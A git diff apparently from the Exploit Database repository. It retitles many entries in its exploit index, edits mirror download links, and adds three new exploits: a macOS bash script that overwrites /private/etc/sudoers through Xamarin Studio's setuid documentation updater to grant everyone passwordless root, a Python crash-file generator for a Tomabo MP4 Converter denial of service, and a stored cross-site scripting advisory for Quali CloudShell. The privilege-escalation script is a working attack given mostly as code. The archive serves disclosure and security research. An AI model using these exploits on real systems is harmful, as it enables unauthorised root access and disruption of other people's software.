diff --git a/files.csv b/files.csv index 8822a1c38..2f4ace62b 100644 --- a/files.csv +++ b/files.csv @@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port 667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0 -677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0 +677,platforms/windows/dos/677.txt,"GetRight 5.2a - '.grs' Skin File Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0 679,platforms/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0 @@ -5639,6 +5639,7 @@ id,file,description,date,author,platform,type,port 42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0 42433,platforms/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos,0 42445,platforms/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",win_x86-64,dos,0 +42451,platforms/windows/dos/42451.py,"Tomabo MP4 Converter 3.19.15 - Denial of Service",2017-08-13,"Andy Bowden",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9178,6 +9179,7 @@ id,file,description,date,author,platform,type,port 42429,platforms/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0 42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0 42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0 +42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9360,7 +9362,7 @@ id,file,description,date,author,platform,type,port 409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0 -418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0 +418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0 421,platforms/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0 424,platforms/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,linux,remote,504 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0 @@ -16413,7 +16415,7 @@ id,file,description,date,author,platform,type,port 659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0 673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 -697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0 +697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit",2004-12-17,overdose,php,webapps,0 702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload (Santy.A)",2004-12-22,anonymous,php,webapps,0 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0 704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote Exploit",2004-12-22,sysbug,php,webapps,80 @@ -25575,7 +25577,7 @@ id,file,description,date,author,platform,type,port 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0 17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored procedure SQL Injection (Metasploit)",2011-10-02,Metasploit,cgi,webapps,0 17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console - Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0 -17925,platforms/php/webapps/17925.txt,"Concrete5 < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 +17925,platforms/php/webapps/17925.txt,"Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0 18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0 @@ -32512,7 +32514,7 @@ id,file,description,date,author,platform,type,port 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80 +31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 @@ -35757,7 +35759,7 @@ id,file,description,date,author,platform,type,port 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Component 'com_videogallery' - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0 -37103,platforms/php/webapps/37103.txt,"Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 +37103,platforms/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37106,platforms/php/webapps/37106.txt,"WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 @@ -37246,7 +37248,7 @@ id,file,description,date,author,platform,type,port 40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445 40042,platforms/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,cgi,webapps,443 -40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 +40045,platforms/php/webapps/40045.txt,"Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution / Cross-Site Request Forgery",2016-07-04,LiquidWorm,jsp,webapps,30303 @@ -37997,6 +37999,7 @@ id,file,description,date,author,platform,type,port 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0 +42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 @@ -38067,7 +38070,7 @@ id,file,description,date,author,platform,type,port 41881,platforms/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",multiple,webapps,0 41882,platforms/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",multiple,webapps,0 41884,platforms/php/webapps/41884.rb,"Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)",2017-04-13,"Peter Lapp",php,webapps,0 -41885,platforms/php/webapps/41885.txt,"Concrete5 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0 +41885,platforms/php/webapps/41885.txt,"Concrete5 CMS 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0 41890,platforms/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,php,webapps,0 41900,platforms/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0 41918,platforms/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",php,webapps,0 @@ -38239,14 +38242,14 @@ id,file,description,date,author,platform,type,port 42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80 42434,platforms/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",hardware,webapps,0 42436,platforms/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,jsp,webapps,0 -42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request",2017-08-09,LiquidWorm,jsp,webapps,0 +42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0 42438,platforms/jsp/webapps/42438.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal",2017-08-09,LiquidWorm,jsp,webapps,0 42439,platforms/jsp/webapps/42439.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0 42440,platforms/php/webapps/42440.txt,"WebFile Explorer 1.0 - Arbitrary File Download",2017-08-09,"Ihsan Sencan",php,webapps,0 42441,platforms/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0 42442,platforms/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0 42443,platforms/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",php,webapps,0 -42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0 +42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0 42446,platforms/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/linux/remote/3021.txt b/platforms/linux/remote/3021.txt index 756b172d6..602376da7 100755 --- a/platforms/linux/remote/3021.txt +++ b/platforms/linux/remote/3021.txt @@ -2,6 +2,6 @@ # solareclipse at phreedom dot org # GPG key ID: E36B11B7 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz) # milw0rm.com [2003-10-15] diff --git a/platforms/linux/remote/609.txt b/platforms/linux/remote/609.txt index 95326c65f..7d78bde96 100755 --- a/platforms/linux/remote/609.txt +++ b/platforms/linux/remote/609.txt @@ -1,4 +1,4 @@ Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz) # milw0rm.com [2004-10-28] diff --git a/platforms/macos/local/42454.txt b/platforms/macos/local/42454.txt new file mode 100755 index 000000000..6872dcdb8 --- /dev/null +++ b/platforms/macos/local/42454.txt @@ -0,0 +1,38 @@ +Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html + +Abstract + +Xamarin Studio is an Integrated Development Environment (IDE) used to create iOS, Mac and Android applications. Xamarin Studio supports developments in C# and F# (by default). The API documentation update mechanism of Xamarin Studio for Mac is installed as setuid root. This update mechanism contains several flaws that could be leveraged by a local attacker to gain elevated (root) privileges. + +Tested versions + +This issue was successfully verified on Xamarin Studio for Mac version 6.2.1 (build 3) and version 6.3 (build 863). + +Fix + +Microsoft released a new version of Xamarin.iOS that addresses this issue: +- Security update for the elevation of privilege vulnerability for Xamarin.iOS: August 14, 2017 (4037359) + +#!/bin/bash +# WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful) +#target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard +target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard +rm -rf ~/Library/Developer/Shared/Documentation/DocSets + +cat << __EOF > /private/tmp/sudoers +%everyone ALL=(ALL) NOPASSWD: ALL +__EOF + +cat << __EOF > ~/.curlrc +url=file:///private/tmp/sudoers +output=/private/etc/sudoers +__EOF + +echo +echo "*** press CRL+C when the download starts ***" +$target +echo + +sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -' + +rm -f /private/tmp/sudoers ~/.curlrc diff --git a/platforms/multiple/dos/1820.txt b/platforms/multiple/dos/1820.txt index 1ea60b232..4ccbac64d 100755 --- a/platforms/multiple/dos/1820.txt +++ b/platforms/multiple/dos/1820.txt @@ -1,5 +1,5 @@ # netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip) # milw0rm.com [2006-05-23] diff --git a/platforms/multiple/dos/2587.txt b/platforms/multiple/dos/2587.txt index 9480f6bb3..a7487162e 100755 --- a/platforms/multiple/dos/2587.txt +++ b/platforms/multiple/dos/2587.txt @@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl pucik[@]overflow.pl http://overflow.pl -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 # milw0rm.com [2006-10-17] diff --git a/platforms/multiple/dos/2911.txt b/platforms/multiple/dos/2911.txt index 890a21ab7..aee08869c 100755 --- a/platforms/multiple/dos/2911.txt +++ b/platforms/multiple/dos/2911.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm) # milw0rm.com [2006-12-10] diff --git a/platforms/multiple/remote/1791.patch b/platforms/multiple/remote/1791.patch index 3cd922e9a..4bf8b208f 100755 --- a/platforms/multiple/remote/1791.patch +++ b/platforms/multiple/remote/1791.patch @@ -15,6 +15,6 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx os->flush(); vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); } -Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) +Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) diff --git a/platforms/multiple/remote/1799.txt b/platforms/multiple/remote/1799.txt index 638c9dc5a..782c0b444 100755 --- a/platforms/multiple/remote/1799.txt +++ b/platforms/multiple/remote/1799.txt @@ -1,8 +1,8 @@ class101 - http://heapoverflow.com RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners --------------------------------------------------------------------- -windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) -linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) +windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) +linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) comments: http://heapoverflow.com/viewtopic.php?p=1729 --------------------------------------------------------------------- diff --git a/platforms/multiple/remote/349.txt b/platforms/multiple/remote/349.txt index 3a9d1cc18..4ba303ec7 100755 --- a/platforms/multiple/remote/349.txt +++ b/platforms/multiple/remote/349.txt @@ -1,3 +1,3 @@ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz) # milw0rm.com [2002-05-01] diff --git a/platforms/php/webapps/697.c b/platforms/php/webapps/697.c index 9616b4a28..994b9e256 100755 --- a/platforms/php/webapps/697.c +++ b/platforms/php/webapps/697.c @@ -1,4 +1,4 @@ -// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/697.rar (phpbbmemorydump.rar) +// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/697.rar (phpbbmemorydump.rar) // Source serv.cpp is at the bottom of the page - str0ke // Notes from author: diff --git a/platforms/windows/dos/1615.txt b/platforms/windows/dos/1615.txt index 730275cf0..af883e1f0 100755 --- a/platforms/windows/dos/1615.txt +++ b/platforms/windows/dos/1615.txt @@ -1,4 +1,4 @@ -# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar (excel_03262006.rar) +# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar (excel_03262006.rar) Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0 Date : 02/12/2006 diff --git a/platforms/windows/dos/1783.txt b/platforms/windows/dos/1783.txt index c27eb9390..2884452dd 100755 --- a/platforms/windows/dos/1783.txt +++ b/platforms/windows/dos/1783.txt @@ -1,5 +1,5 @@ # Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip (05132006-genecysbof.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip (05132006-genecysbof.zip) # milw0rm.com [2006-05-14] diff --git a/platforms/windows/dos/1784.txt b/platforms/windows/dos/1784.txt index 135cc6679..dc67195d2 100755 --- a/platforms/windows/dos/1784.txt +++ b/platforms/windows/dos/1784.txt @@ -1,5 +1,5 @@ # Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip) diff --git a/platforms/windows/dos/3690.txt b/platforms/windows/dos/3690.txt index 41df29480..d0b2b02c4 100755 --- a/platforms/windows/dos/3690.txt +++ b/platforms/windows/dos/3690.txt @@ -26,7 +26,7 @@ file613-1.doc - Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100 %, a These files can be found at http://www.offensive-security.com/0day/0day.tar.gz -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3690.tar.gz (04092007-0day.tar.gz) +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3690.tar.gz (04092007-0day.tar.gz) Be safe, diff --git a/platforms/windows/dos/4121.txt b/platforms/windows/dos/4121.txt index 160cb3842..21f7b9e9c 100755 --- a/platforms/windows/dos/4121.txt +++ b/platforms/windows/dos/4121.txt @@ -4,6 +4,6 @@ http://www.ph4nt0m.org Tested on: Full Patched Excel 2003 Sp2, CN -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip (06272007-2670.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip (06272007-2670.zip) # milw0rm.com [2007-06-27] diff --git a/platforms/windows/dos/42451.py b/platforms/windows/dos/42451.py new file mode 100755 index 000000000..bdc5afb0b --- /dev/null +++ b/platforms/windows/dos/42451.py @@ -0,0 +1,20 @@ +#!/usr/bin/python + +# Exploit Title: Tomabo MP4 Converter DOS +# Date: 13/08/17 +# Exploit Author: Andy Bowden +# Vendor Homepage: http://www.tomabo.com/ +# Software Link: http://www.tomabo.com/mp4-converter/index.html +# Version: 3.19.15 +# Tested on: Windows 7 x86 +# CVE : None + +#Generate a .m3u file using the python script and import it into the MP4 Converter. + +file = "crash.m3u" + +buffer = "A" * 550000 + +f = open(file, "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/677.txt b/platforms/windows/dos/677.txt index 2f9f8c5be..ac107a2b8 100755 --- a/platforms/windows/dos/677.txt +++ b/platforms/windows/dos/677.txt @@ -20,7 +20,7 @@ Solutions: There was no response. Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/677.grs (c_skin.grs) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/677.grs (c_skin.grs) When you copy or click this link, getright automaticly download and try to load crafted skin and will trigger buffer overflow diff --git a/platforms/windows/dos/770.txt b/platforms/windows/dos/770.txt index 84cbd6311..76c3eee4d 100755 --- a/platforms/windows/dos/770.txt +++ b/platforms/windows/dos/770.txt @@ -15,7 +15,7 @@ will can cause the remote system to crash. --Uncompleted qtif image file header http://www.atmacasoft.com/exp/vuln.qtif.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/770.qtif (vuln.qtif) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/770.qtif (vuln.qtif) 00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............ 0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt index e9dfbcc66..513971c8f 100755 --- a/platforms/windows/local/11199.txt +++ b/platforms/windows/local/11199.txt @@ -1,5 +1,5 @@ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip) -EDB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder. +E-DB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder. diff --git a/platforms/windows/webapps/42453.txt b/platforms/windows/webapps/42453.txt new file mode 100755 index 000000000..376903ef7 --- /dev/null +++ b/platforms/windows/webapps/42453.txt @@ -0,0 +1,96 @@ +# Vulnerability type: Multiple Stored Cross Site Scripting +# Vendor: Quali +# Product: CloudShell +# Affected version: v7.1.0.6508 (Patch 6) +# Patched version: v8 and up +# Credit: Benjamin Lee +# CVE ID: CVE-2017-9767 + +========================================================== + +# Overview +Quali CloudShell (v7.1.0.6508 Patch 6) is vulnerable to multiple stored XSS vulnerabilities on its platform this can be exploited to execute arbitrary HTML and script code on all users (including administrators) from a low-privileged account. + +========================================================== + +# Vulnerable URL 1 (Reservation Function) +/RM/Reservation/ReserveNew + +# Vulnerable parameter(s) +- Name +- Description + +# Sample payload +'"> + +# PROOF OF CONCEPT +- Go to the "Inventory" tab +- Click on details button on either of the items +- Click on the reserve button and enter the XSS payload onto the affected parameters +- Add users to the permitted user list (e.g. admin accounts) +- Once the user click on the reservation list details, the XSS would be executed + +========================================================== + +# Vulnerable URL 2 (Environment Function) +/RM/Topology/Update + +# Vulnerable parameter(s) +- Description + +# Sample payload +'"> + +# PROOF OF CONCEPT +- Go to the "Environment" tab +- Click on item properties button +- Enter the XSS payload onto the affected parameters +- Change the owner to another user (e.g. admin accounts) +- Once the user click on the more info button of the item in the environment tab, the XSS would be executed + +========================================================== + +# Vulnerable URL 3 (Job Scheduling Function) +/SnQ/JobTemplate/Edit?jobTemplateId= + +# Vulnerable parameter(s) 